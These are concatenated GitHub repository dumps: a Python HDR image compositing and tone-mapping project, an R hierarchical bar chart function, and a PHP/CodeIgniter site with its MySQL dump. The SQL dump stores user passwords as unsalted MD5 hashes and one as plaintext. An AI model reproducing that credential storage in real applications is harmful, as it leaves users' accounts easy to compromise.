refs/heads/master | <repo_name>lorabit/cmpe264project1<file_sep>/hdr.py
import cv2
import os
from PIL import Image
from PIL.ExifTags import TAGS
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model
import numpy as np
from math import log
sample_rect = (1300,1300,100,100)
channel = 2
exposure_times = []
sample_values = []
count = 0
g_channels = [1.484, 1.962, 2.308]
# def sample(filename):
# image = cv2.imread('hdr/'+filename)
# ret = 0
# sample_image = np.zeros((sample_rect[2],sample_rect[3],3), np.uint8)
# for i in range(0,sample_rect[2]):
# for j in range(0,sample_rect[3]):
# sample_image[i][j] = [image[i+sample_rect[0]][j+sample_rect[1]][channel]]*3
# ret = ret + image[i+sample_rect[0]][j+sample_rect[1]][channel]
# cv2.imwrite('t/samples/'+str(count)+'_'+str(channel)+'.jpg',sample_image)
# return float(ret)/(sample_rect[2]*sample_rect[3])
def exposure(filename):
image = Image.open('hdr/'+filename)
info = image._getexif()
exposure_time = info[33434]
print(exposure_time)
return float(exposure_time[0])/exposure_time[1]
def linealized(filename,a):
image = cv2.imread('hdr/'+filename)
if a == 1:
return image
new_image = np.zeros(image.shape, np.float)
multipler = [pow(a,1.0/g_channels[k]) for k in range(3)]
for i in range(image.shape[0]):
line = image[i]
for j in range(image.shape[1]):
row = line[j]
for k in range(3):
new_image[i][j][k] = row[k]*multipler[k]
cv2.imwrite('hdr/linealized/'+filename,new_image)
return new_image
def simple_linear(filename):
image = cv2.imread('hdr/'+filename)
new_image = np.zeros(image.shape, np.float)
for i in range(image.shape[0]):
line = image[i]
for j in range(image.shape[1]):
row = line[j]
for k in range(3):
new_image[i][j][k] = pow(row[k],g_channels[k])/pow(255,g_channels[k]-1)
cv2.imwrite('hdr/simple_linear/'+filename,new_image)
return new_image
files = os.listdir('hdr')
valid_files = []
for filename in files:
if filename[-3:].lower()=='jpg':
exposure_times.append(exposure(filename))
valid_files.append(filename)
#Simple Linearization
#After Linearization then creat combined HDR image by ziqiang
imgs = []
for filename in valid_files:
imgs.append(simple_linear(filename))
HDR_img_method_1 = np.zeros(imgs[0].shape, np.float32)
HDR_img_method_2 = np.zeros(imgs[0].shape, np.float32)
HDR_img_method_3 = np.zeros(imgs[0].shape, np.float32)
threshold = 200
for i in range(len(imgs[0])):
for j in range(len(imgs[0][0])):
for k in range(len(imgs[0][0][0])):
if imgs[2][i][j][k] < threshold:
HDR_img_method_1[i][j][k] = imgs[2][i][j][k] * (exposure_times[0]/exposure_times[2])
elif imgs[1][i][j][k] <threshold:
HDR_img_method_1[i][j][k] = imgs[1][i][j][k] * (exposure_times[0]/exposure_times[1])
else:
HDR_img_method_1[i][j][k] = imgs[0][i][j][k]
cv2.imwrite('hdr/combined/HDR_img_method_1.jpg',HDR_img_method_1)
for i in range(len(imgs[0])):
for j in range(len(imgs[0][0])):
for k in range(len(imgs[0][0][0])):
s = imgs[0][i][j][k]
n = 1
if imgs[2][i][j][k] < threshold:
n = n +1
s = s + imgs[2][i][j][k] * (exposure_times[0]/exposure_times[2])
if imgs[1][i][j][k] <threshold:
n = n + 1
s = s + imgs[1][i][j][k] * (exposure_times[0]/exposure_times[1])
HDR_img_method_2[i][j][k] = s/n
cv2.imwrite('hdr/combined/HDR_img_method_2.jpg',HDR_img_method_2)
a1 = exposure_times[1]/exposure_times[0]
a2 = exposure_times[2]/exposure_times[0]
weight1 = 1/(pow(a1,2))
weight2 = 1/(pow(a2,2))
for i in range(len(imgs[0])):
for j in range(len(imgs[0][0])):
for k in range(len(imgs[0][0][0])):
s = imgs[0][i][j][k]
n = 1
if imgs[2][i][j][k] < threshold:
n = n + weight2
s = s + weight2 * imgs[2][i][j][k] * (exposure_times[0]/exposure_times[2])
if imgs[1][i][j][k] <threshold:
n = n + weight1
s = s + weight1 * imgs[1][i][j][k] * (exposure_times[0]/exposure_times[1])
HDR_img_method_3[i][j][k] = s/n
cv2.imwrite('hdr/combined/HDR_img_method_3.jpg',HDR_img_method_3)
# tone map ziqiang
gam_value = 2.2
tonemap1 = cv2.createTonemapDurand(gamma=gam_value)
res_tonemap1 = tonemap1.process(HDR_img_method_1.copy())
res_tonemap1_8bit = np.clip(res_tonemap1*255, 0, 255).astype('uint8')
cv2.imwrite("hdr/tonemapped/res_tonemap1_8bit.jpg", res_tonemap1_8bit)
tonemap2 = cv2.createTonemapDurand(gamma=gam_value)
res_tonemap2 = tonemap2.process(HDR_img_method_2.copy())
res_tonemap2_8bit = np.clip(res_tonemap2*255, 0, 255).astype('uint8')
cv2.imwrite("hdr/tonemapped/res_tonemap2_8bit.jpg", res_tonemap2_8bit)
tonemap3 = cv2.createTonemapDurand(gamma=gam_value)
res_tonemap3 = tonemap3.process(HDR_img_method_3.copy())
res_tonemap3_8bit = np.clip(res_tonemap3*255, 0, 255).astype('uint8')
cv2.imwrite("hdr/tonemapped/res_tonemap3_8bit.jpg", res_tonemap3_8bit)
# Average HDR
# dest_exposure_time = 1.0/10.0
# print('linealizing image 0...')
# img1 = linealized(valid_files[0],dest_exposure_time/exposure_times[0])
# print('linealizing image 1...')
# img2 = linealized(valid_files[1],dest_exposure_time/exposure_times[1])
# print('linealizing image 2...')
# img3 = linealized(valid_files[2],dest_exposure_time/exposure_times[2])
# print('generating HDR image...')
# new_image = np.zeros(img1.shape, np.float)
# for i in range(img1.shape[0]):
# for j in range(img1.shape[1]):
# for k in range(3):
# new_image[i][j][k] = (img1[i][j][k] + img2[i][j][k] + img3[i][j][k])/3
# cv2.imwrite('hdr/linealized/avg.jpg',new_image)
<file_sep>/test.py
import cv2
print"hello workd"
img = cv2.imread('images/0.3_100.JPG',0)
cv2.imshow('window_name',img)
cv2.waitKey(5000)
cv2.destroyAllWindows()
<file_sep>/README.md
# Requirements
1. OpenCV with contrib
2. numpy
3. sklearn
4. matplotlib
5. pillow
6. Python 2.7
# Part 1
Before you run p1.py, you may need to edit this file to adjust some parameters as follow:
1. sample_rect: a array of 4 elements indicating the position(x,y) and size(height,width) of simpling area. In our case, we set it to (1300,1300,100,100).
2. channel: a int specifying which channel we are dealing with. 0 for Blue, 1 for Green and 2 for Red.
Then, you can get linear regression and its plot by running p1.py.
# Part 3&4
In part 3 we generate HDR composite images with three different algorithms as required, and part 4 we make tone map images of the three outputs from three HDR composite algorithms. So we write the part 3 and part 4 in the hdr.py such that we could acquire the result of simple_linear() function to do HDR composite and then make use of HDR composite results to do tone map.
Before you run hdr.py, you may need to madify the following paremeters if you need:
1. threshold: this is the value we use to determine whether the pixel value is sturated in the HDR composite algorithms. We tried a lot of times that the 255 is not ideal value, so we set the value to be 200 as the default value in the hdr.py, you may modify the value if you want to see different outputs image from the HDR composite algorithm.
2. gam_value: When we use the tone map function, there is a gamma correction parameter gamma need to be set, we read from the OpenCV API that the gamma is positive value of type float. Generally speaking, if gamma > 1 the function will brighten the image, if gamma < 1 the function will darken the image. The gamma value of 1.0 implies no correction, $gamma$ equal to 2.2 is suitable for most displays. We set 2.2 to be the default value in hdr.py, you may change the value if you would like to see different outputs of tone map function.
After you run hdr.py, you may find the output images in the following directories:
1. /hdr/combined: the outputs of three HDR comosite algorithms will be saved in this directory.
2. /hdr/tonemapped: the outputs of the tone map function for three HDR composite algorithms will be saved in this directory.
<file_sep>/p1.py
import cv2
import os
from PIL import Image
from PIL.ExifTags import TAGS
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model
import numpy as np
from math import log
sample_rect = (1300,1300,100,100)
channel = 2
exposure_times = []
sample_values = []
count = 0
def sample(filename):
image = cv2.imread('t/'+filename)
ret = 0
sample_image = np.zeros((sample_rect[2],sample_rect[3],3), np.uint8)
for i in range(0,sample_rect[2]):
for j in range(0,sample_rect[3]):
sample_image[i][j] = [image[i+sample_rect[0]][j+sample_rect[1]][channel]]*3
ret = ret + image[i+sample_rect[0]][j+sample_rect[1]][channel]
cv2.imwrite('t/samples/'+str(count)+'_'+str(channel)+'.jpg',sample_image)
return float(ret)/(sample_rect[2]*sample_rect[3])
def exposure(filename):
image = Image.open('t/'+filename)
info = image._getexif()
exposure_time = info[33434]
print(exposure_time)
return float(exposure_time[0])/exposure_time[1]
files = os.listdir('t')
for filename in files:
if filename[-3:].lower()=='jpg':
exposure_times.append(log(exposure(filename)))
sample_values.append(log(sample(filename)))
count = count + 1
print(exposure_times)
print(sample_values)
regr = linear_model.LinearRegression()
# Train the model using the training sets
train_x = np.array(exposure_times).reshape(len(exposure_times),1)
train_y = np.array(sample_values).reshape(len(sample_values),1)
regr.fit(train_x, train_y)
# The coefficients
print(regr.coef_)
g = regr.coef_[0][0]
print(1/g)
print(regr.intercept_)
print(np.mean((regr.predict(train_x) - train_y) ** 2))
fited_x = train_x
fited_y = regr.predict(fited_x)
plt.scatter(exposure_times,sample_values,color ='Red')
plt.plot(fited_x,fited_y)
plt.plot()
plt.xlabel('T(s)')
plt.ylabel('B\'^g')
plt.show()
# for tag, value in info.items():
# decoded = TAGS.get(tag, tag)
# print(decoded)
# print(tag)
| 31f578a69a0ed10254180636381b36d4b2211136 | [
"Markdown",
"Python"
] | 4 | Python | lorabit/cmpe264project1 | a425831a0dbf12f8c3d7eb0cd7f292d2b1e7f7b7 | 1f630b185560e939ac16bed3bd38d0c0754b513e |
refs/heads/master | <repo_name>JohnnyPeng123/hierarchical_bar_chart-<file_sep>/hbar.r
hbar <- function(data,groupings,method,left_margin = 200,font_size = 15, ticks_width = 100, num_variable=NULL,na.rm=T){
if (method == "count") {
data_agg <- data %>% group_by(.dots = groupings) %>% summarise(count = n()) %>% data.table()
} else if (method == "sum" & !is.null(num_variable)) {
data_agg <- data %>% group_by(.dots = groupings) %>% summarise(sum = sum(!!sym(num_variable)),na.rm=na.rm) %>% data.table()
} else if (method == "mean" & !is.null(num_variable)) {
data_agg <- data %>% group_by(.dots = groupings) %>% summarise(mean = mean(!!sym(num_variable)),na.rm=na.rm) %>% data.table()
}
output <- list()
output$name <- "data"
for (var in 1:length(groupings)){
eval(parse(text=paste0("data_agg[,'syntax",var,"']<-NA")))
for (children in 1:length(unique(unlist(data_agg[,..var])))){
eval(parse(text=paste0(
"data_agg[,'syntax_temp']<-rep(unique(data_agg[,",var,"])[",children,"],nrow(data_agg))"
)))
eval(parse(text=paste0(
"data_agg[,'syntax",var,"']","<-ifelse(data_agg[,",var,"]==data_agg[,'syntax_temp'],'$children[[",children,"]]',unlist(data_agg[,'syntax",var,"']))"
)))
}
if (var > 1) {
eval(parse(text=paste0(
"data_agg[,'syntax",var,"']<-paste0(","unlist(data_agg[,'syntax",var-1,"']),unlist(data_agg[,'syntax",var,"']))"
)))
}
eval(parse(text=paste0(
"names <- unique(data_agg[,c('syntax",var,"',..groupings[",var,"],'",method,"')])"
)))
eval(parse(text=paste0(
"names$syntax_order", " <- as.numeric(gsub('[^0-9.-]','',names$syntax",var,"))"
)))
names <- names[order(syntax_order)]
for (row in nrow(names):1) {
eval(parse(text=paste0(
"output",names[row,1],"$name[1]<-unlist(names[",row,",2])"
)))
}
if (var==length(groupings)){
for (row in nrow(names):1) {
eval(parse(text=paste0(
"output",names[row,1],"$value[1]<-unlist(names[",row,",3])"
)))
}
}
}
output <- list.clean(output, fun = is.null, recursive=T)
return(suppressWarnings(r2d3(data=output, script =gsub("10px", paste0(as.character(font_size),"px"),
gsub("/ 80", paste0("/ ",as.character(ticks_width)),
gsub(", 20", paste0(", ",as.character(font_size)),
gsub("left: 100", paste0("left: ",as.character(left_margin)),
readLines("https://raw.githubusercontent.com/JohnnyPeng123/hierarchical_bar_chart-/master/hbar.js")
))))
)))
}
<file_sep>/demo.r
library(r2d3)
library(data.table)
library(dplyr)
library(rlist)
source("https://raw.githubusercontent.com/JohnnyPeng123/hierarchical_bar_chart-/master/hbar.r")
# Read in sample data file
data <- setDT(read.csv("https://raw.githubusercontent.com/JohnnyPeng123/hierarchical_bar_chart-/master/aug_train.csv"))
data$target <- ifelse(data$target==1,"Looking for a job","Not looking for a job")
# Specify the hierarchical relationship
groupings <- c("target","last_new_job","relevent_experience","education_level")
# Generate and view the hierarchical bar chart
chart <- hbar(data,groupings,method="count",left_margin=200,font_size=15,ticks_width=100, num_variable=NULL,na.rm=T)
chart
<file_sep>/README.md
# Hierarchical Bar Chart (hbar chart) in R
Original visualization by @mbostockBy <NAME> from:
https://observablehq.com/@d3/hierarchical-bar-chart

I was amazed by this visualization, and I would like to create the same vis in R. (R is the primary language that I use for work)
so I have created this "hbar" function to replicate this visualization in R environment.
# How to Use the "hbar" function
A quick demo on how to use this "hbar" function to generate hierarchical bar chart in R:
https://github.com/JohnnyPeng123/hierarchical_bar_chart-/blob/master/demo.r
"hbar" function has 3 required arguments:
1. data - A data.table object in the R environment that contains the data that will be used to generate hbar chart.
2. groupings - A vector of strings that contains the names of the categorical variables that will form a hierarchical relationship, from left to right, representing the highest to the lowest level in this hierarchical relationship.
3. method - method will be used to perform aggregation, you can either use "count" or "sum", although "mean" is also available, but the output will not make sense at this stage, I am planning to show the average/median value as a dot/line on top of the bars in the future.
And 5 optional arguments with default value:
1. left_margin (default = 200) - the amount of white space on the left reservered for displaying the texts
2. font_size (default = 15) - size of the fonts for all the texts displayed in the graph
3. ticks_width (default = 100) - width between the ticks on the x-axis
4. num_variable (default = NULL) - if method does not equal to "count", you can use this to specify a numeric variable that should be used for aggregation.
5. na.rm (default = T) - whether or not to remove observations with missing values during aggregation.
# Files in this Repo
0. README.md documentation
1. aug_train.csv - A sample data file that I used to develop this function.
It was downloaded from "https://www.kaggle.com/arashnic/hr-analytics-job-change-of-data-scientists"
2. hbar.js - JavaScript that used to generate the hbar, slightly modified from the original ones by <NAME>
3. hbar.r - R function named "hbar" that produce hbar chart in R environment leveraging "r2d3" package and the original D3.js by <NAME>
4. demo.r - a simple use case to demonstration how to use the hbar.r function to generate hbar chart.
| 9a4b6e05f5f5a0309901f3d6932f136dc4567f70 | [
"Markdown",
"R"
] | 3 | R | JohnnyPeng123/hierarchical_bar_chart- | 6e16d8761675ce47475b53da21501fe18a085dd4 | 0a90a6e4735a83a4cd7411b46a2297687d921ede |
refs/heads/master | <repo_name>Irwin99/microsite-bpt<file_sep>/db_vorcee.sql
-- phpMyAdmin SQL Dump
-- version 4.4.12
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: 09 Des 2016 pada 14.08
-- Versi Server: 5.6.25
-- PHP Version: 5.6.11
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `db_vorcee`
--
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_ads`
--
CREATE TABLE IF NOT EXISTS `vc_ads` (
`id_ads` int(11) NOT NULL,
`name_ads` varchar(100) NOT NULL,
`image_ads` varchar(200) NOT NULL,
`link_ads` varchar(200) NOT NULL,
`description_ads` longtext NOT NULL,
`fee_ads` decimal(10,0) NOT NULL,
`price_ads` decimal(10,0) NOT NULL,
`current_price` decimal(10,0) NOT NULL,
`date_ads` datetime NOT NULL,
`id_user` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_banner`
--
CREATE TABLE IF NOT EXISTS `vc_banner` (
`id_banner` int(11) NOT NULL,
`title_banner` varchar(150) NOT NULL,
`image_banner` varchar(200) NOT NULL,
`caption_banner` longtext NOT NULL,
`link_banner` varchar(200) NOT NULL,
`id_user` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_category`
--
CREATE TABLE IF NOT EXISTS `vc_category` (
`id_category` int(11) NOT NULL,
`name_category` varchar(200) NOT NULL,
`image_category` varchar(200) NOT NULL
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=latin1;
--
-- Dumping data untuk tabel `vc_category`
--
INSERT INTO `vc_category` (`id_category`, `name_category`, `image_category`) VALUES
(1, 'fashion', ''),
(2, 'Performace Art', ''),
(3, 'Craft', ''),
(4, 'Design', ''),
(5, 'Media', ''),
(6, 'Music', ''),
(7, 'Publishing', ''),
(8, 'Advertising', ''),
(9, 'Art Market', ''),
(10, 'Architecture', ''),
(11, 'Computer', ''),
(12, 'Research Development', '');
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_class`
--
CREATE TABLE IF NOT EXISTS `vc_class` (
`id_class` int(11) NOT NULL,
`date_class` date NOT NULL,
`place_class` varchar(100) NOT NULL,
`time_class` varchar(100) NOT NULL,
`title_class` varchar(100) NOT NULL,
`description_class` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_hit_ads`
--
CREATE TABLE IF NOT EXISTS `vc_hit_ads` (
`id_hit_ads` bigint(20) NOT NULL,
`id_ads` int(11) NOT NULL,
`id_user` int(11) NOT NULL,
`ip_address` varchar(20) NOT NULL,
`date_hit` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_order`
--
CREATE TABLE IF NOT EXISTS `vc_order` (
`id_order` bigint(20) NOT NULL,
`id_product` int(11) NOT NULL,
`id_user` int(11) NOT NULL,
`id_payment` int(11) NOT NULL,
`date_order` int(11) NOT NULL,
`status_order` tinyint(4) NOT NULL COMMENT '0: Pending, 1: Process, 2: Done'
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_payment`
--
CREATE TABLE IF NOT EXISTS `vc_payment` (
`id_payment` int(11) NOT NULL,
`name_payment` varchar(200) NOT NULL,
`account_name` varchar(200) NOT NULL,
`account_number` varchar(20) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_product`
--
CREATE TABLE IF NOT EXISTS `vc_product` (
`id_product` int(11) NOT NULL,
`id_campaigner` int(11) NOT NULL,
`id_admin` int(11) NOT NULL,
`id_category` int(11) NOT NULL,
`name_product` varchar(200) NOT NULL,
`start_price` decimal(10,0) NOT NULL,
`current_price` decimal(10,0) NOT NULL,
`image_product` varchar(200) NOT NULL,
`about_product` longtext NOT NULL,
`dimension` varchar(100) NOT NULL,
`material` varchar(100) NOT NULL,
`date_product` datetime NOT NULL,
`date_end_campaign` datetime NOT NULL,
`status_product` tinyint(1) NOT NULL COMMENT '0: Pending, 1: Active, 2: Sold, 3: Rejected',
`date_mod` date NOT NULL,
`place_mod` varchar(100) NOT NULL,
`time_mod` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_setting`
--
CREATE TABLE IF NOT EXISTS `vc_setting` (
`id_setting` int(11) NOT NULL,
`about` longtext NOT NULL,
`phone_number` varchar(15) NOT NULL,
`title_website` varchar(100) NOT NULL,
`campaign_report` longtext NOT NULL,
`achievement` longtext NOT NULL,
`address` longtext NOT NULL,
`partner` longtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_tip`
--
CREATE TABLE IF NOT EXISTS `vc_tip` (
`id_tip` bigint(20) NOT NULL,
`id_user` int(11) NOT NULL,
`id_product` int(11) NOT NULL,
`tip` decimal(10,0) NOT NULL,
`date_tip` datetime NOT NULL,
`status_tip` tinyint(1) NOT NULL COMMENT '0: Pending, 1: Win, 2: Loose'
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_user`
--
CREATE TABLE IF NOT EXISTS `vc_user` (
`id_user` int(11) NOT NULL,
`username` varchar(20) NOT NULL,
`password` char(32) NOT NULL,
`full_name` varchar(100) NOT NULL,
`avatar` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`address` longtext NOT NULL,
`gender` tinyint(1) NOT NULL COMMENT '0: Note Set, 1: Male, 2: Female',
`phone_number` varchar(20) NOT NULL,
`mobile` varchar(100) NOT NULL,
`country` varchar(100) NOT NULL,
`province` varchar(100) NOT NULL,
`city` varchar(100) NOT NULL,
`about_user` longtext NOT NULL,
`organization_name` varchar(100) NOT NULL,
`status_user` tinyint(1) NOT NULL COMMENT '0: Nonactive, 1: Active, 2: Banned',
`permission` tinyint(1) NOT NULL COMMENT '0: Creator, 1: Admin, 2: Learner',
`date_register` datetime NOT NULL,
`date_login` datetime NOT NULL,
`contact_person` varchar(100) NOT NULL
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
--
-- Dumping data untuk tabel `vc_user`
--
INSERT INTO `vc_user` (`id_user`, `username`, `password`, `full_name`, `avatar`, `email`, `address`, `gender`, `phone_number`, `mobile`, `country`, `province`, `city`, `about_user`, `organization_name`, `status_user`, `permission`, `date_register`, `date_login`, `contact_person`) VALUES
(1, 'admin', '<PASSWORD>', 'zuhdi', '', '', '', 1, '', '', '', '', '', '', '', 1, 1, '2016-08-03 12:24:33', '0000-00-00 00:00:00', ''),
(2, 'vorcee', 'a8f5f167f44f4964e6c998dee827110c', '<NAME>', 'asset/images/user/1.jpg', '<EMAIL>', 'Bsd Cipondoh', 0, '08123123123', '', 'Indonesia', 'Jabar', 'jakarta', 'Namaku Diena Adyanthy , saya tinggal di bsd , saya seorang artis ternama , semua orang kenal saya , bahkan kalo saya keluar paparazi dimana mana hahaha, itulah saya :)', '', 1, 2, '2016-08-01 12:16:47', '0000-00-00 00:00:00', ''),
(3, 'andien', 'asdasd', '<NAME>', 'asset/images/user/andien.jpg', '<EMAIL>', 'jalan kavling ui', 0, '08123123123', '', 'Indonesia', 'Jabar', 'Bandung', 'artis', '', 1, 0, '2016-10-13 06:14:51', '0000-00-00 00:00:00', ''),
(4, 'hihooxz', '7815696ecbf1c96e6894b779456d330e', '', '', '<EMAIL>', '', 0, '', '', '', '', '', '', '', 0, 2, '2016-12-09 11:35:21', '0000-00-00 00:00:00', '');
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_workshop`
--
CREATE TABLE IF NOT EXISTS `vc_workshop` (
`id_workshop` int(11) NOT NULL,
`id_category` int(11) NOT NULL,
`workshop_title` varchar(200) NOT NULL,
`workshop_description` longtext NOT NULL,
`image_workshop` varchar(200) NOT NULL,
`course_fee` int(11) NOT NULL,
`hour_start` varchar(200) NOT NULL,
`hour_end` varchar(200) NOT NULL,
`date_workshop` date NOT NULL,
`date_insert` date NOT NULL
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
--
-- Dumping data untuk tabel `vc_workshop`
--
INSERT INTO `vc_workshop` (`id_workshop`, `id_category`, `workshop_title`, `workshop_description`, `image_workshop`, `course_fee`, `hour_start`, `hour_end`, `date_workshop`, `date_insert`) VALUES
(1, 1, 'fashion good', 'fashion is gooda', 'asset/images/workshop/asos4.jpg', 100000, '12:30 PM', '15:00 PM', '2016-11-15', '2016-11-16');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `vc_ads`
--
ALTER TABLE `vc_ads`
ADD PRIMARY KEY (`id_ads`);
--
-- Indexes for table `vc_banner`
--
ALTER TABLE `vc_banner`
ADD PRIMARY KEY (`id_banner`);
--
-- Indexes for table `vc_category`
--
ALTER TABLE `vc_category`
ADD PRIMARY KEY (`id_category`);
--
-- Indexes for table `vc_class`
--
ALTER TABLE `vc_class`
ADD PRIMARY KEY (`id_class`);
--
-- Indexes for table `vc_hit_ads`
--
ALTER TABLE `vc_hit_ads`
ADD PRIMARY KEY (`id_hit_ads`);
--
-- Indexes for table `vc_order`
--
ALTER TABLE `vc_order`
ADD PRIMARY KEY (`id_order`);
--
-- Indexes for table `vc_payment`
--
ALTER TABLE `vc_payment`
ADD PRIMARY KEY (`id_payment`);
--
-- Indexes for table `vc_product`
--
ALTER TABLE `vc_product`
ADD PRIMARY KEY (`id_product`);
--
-- Indexes for table `vc_setting`
--
ALTER TABLE `vc_setting`
ADD PRIMARY KEY (`id_setting`);
--
-- Indexes for table `vc_tip`
--
ALTER TABLE `vc_tip`
ADD PRIMARY KEY (`id_tip`);
--
-- Indexes for table `vc_user`
--
ALTER TABLE `vc_user`
ADD PRIMARY KEY (`id_user`);
--
-- Indexes for table `vc_workshop`
--
ALTER TABLE `vc_workshop`
ADD PRIMARY KEY (`id_workshop`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `vc_ads`
--
ALTER TABLE `vc_ads`
MODIFY `id_ads` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_banner`
--
ALTER TABLE `vc_banner`
MODIFY `id_banner` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_category`
--
ALTER TABLE `vc_category`
MODIFY `id_category` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=13;
--
-- AUTO_INCREMENT for table `vc_class`
--
ALTER TABLE `vc_class`
MODIFY `id_class` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_hit_ads`
--
ALTER TABLE `vc_hit_ads`
MODIFY `id_hit_ads` bigint(20) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_order`
--
ALTER TABLE `vc_order`
MODIFY `id_order` bigint(20) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_payment`
--
ALTER TABLE `vc_payment`
MODIFY `id_payment` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_product`
--
ALTER TABLE `vc_product`
MODIFY `id_product` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_setting`
--
ALTER TABLE `vc_setting`
MODIFY `id_setting` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_tip`
--
ALTER TABLE `vc_tip`
MODIFY `id_tip` bigint(20) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_user`
--
ALTER TABLE `vc_user`
MODIFY `id_user` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `vc_workshop`
--
ALTER TABLE `vc_workshop`
MODIFY `id_workshop` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=2;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/application/views/admin/common/header.php
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title><?php echo $title_web?></title>
<!-- Tell the browser to be responsive to screen width -->
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<!-- Bootstrap 3.3.6 -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/bootstrap/css/bootstrap.min.css')?>">
<!-- Font Awesome -->
<link href="<?php echo base_url('asset/asset_default/font-awesome/css/font-awesome.min.css')?>" rel="stylesheet" type="text/css">
<!-- Theme style -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/dist/css/AdminLTE.min.css')?>">
<!-- AdminLTE Skins. Choose a skin from the css/skins
folder instead of downloading all of them to reduce the load. -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/dist/css/skins/_all-skins.min.css')?>">
<!-- iCheck -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/iCheck/flat/blue.css')?>">
<!-- Morris chart -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/morris/morris.css')?>">
<!-- jvectormap -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/jvectormap/jquery-jvectormap-1.2.2.css')?>">
<!-- Date Picker -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/datepicker/datepicker3.css')?>">
<!-- Daterange picker -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/daterangepicker/daterangepicker.css')?>">
<!-- bootstrap wysihtml5 - text editor -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/admin_default.css')?>">
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.min.css')?>">
<!-- jQuery 2.2.0 -->
<file_sep>/application/controllers/adminpanel/Page.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
// class Page extends CI_Controller {
//
// // public function __construct(){
// // parent::__construct();
// // }
//
// // public function add_user(){
// // $data['title_web']= 'Add User';
// // $data['path_content']='admin/module/add_user';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function manage_user(){
// // $data['title_web']= 'Manage User';
// // $data['path_content']='admin/module/manage_user';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function add_news(){
// // $data['title_web']= 'Add News';
// // $data['path_content']='admin/module/add_news';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function manage_news(){
// // $data['title_web']= 'Manage News';
// // $data['path_content']='admin/module/manage_news';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function add_category(){
// // $data['title_web']= 'Add Category';
// // $data['path_content']='admin/module/add_category';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function manage_category(){
// // $data['title_web']= 'Manage Category';
